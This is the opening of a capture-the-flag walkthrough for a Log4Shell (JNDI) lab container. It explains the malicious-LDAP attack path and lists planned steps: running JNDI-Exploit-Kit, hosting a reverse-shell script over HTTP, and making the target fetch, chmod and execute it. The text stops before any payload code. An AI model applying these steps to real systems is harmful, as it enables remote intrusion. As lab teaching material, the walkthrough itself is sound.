Want to run this Docker container locally?
docker run -d -p 9026:8080 -p 3306:3306 --restart always --name Flag-red47 joshbeck2024/ctf-log4shell-jndi-flag-red47
- This one is a tough nut to crack, but log4shell is definitely out there!
JNDI / Malicious LDAP Attack Path (CTF Overview)
- In this challenge, an attacker runs JNDI-Exploit-Kit, which spins up a malicious LDAP server under the attacker’s control.
- When the vulnerable application logs attacker-supplied input, that input contains a specially crafted JNDI lookup string.
- Instead of just recording text, the logger unknowingly asks the LDAP server for instructions.
- The attacker’s LDAP server responds with instructions that instruct the vulnerable application to load and execute attacker-controlled code.
- Because the application trusts JNDI lookups, it automatically follows these instructions, resulting in remote command execution triggered by logging data.
Steps We’ll Take:
- We’ll prep Kali so it is running a version of Java that is <12, because newer versions of Java won’t work correctly with
JNDI-Exploit-Kit
- We’ll use
JNDI-Exploit-Kit to spin up a vulnerable LDAP server on port 1389.
- We will specify
-C when we create this server.
-C means (command)- Anything we put after
-C will be executed on the server.
- We’ll spin up an
http.server on port 8000, which will host a reverse-shell file we want to execute. (bash.sh)
- We’ll force the vulnerable machine to fetch this file.
- We’ll force the vulnerable machine to
chmod 777 the file
- We’ll force the machine to execute the reverse shell, which we’ll be listening for on our attack box.
Install maven
sudo apt install maven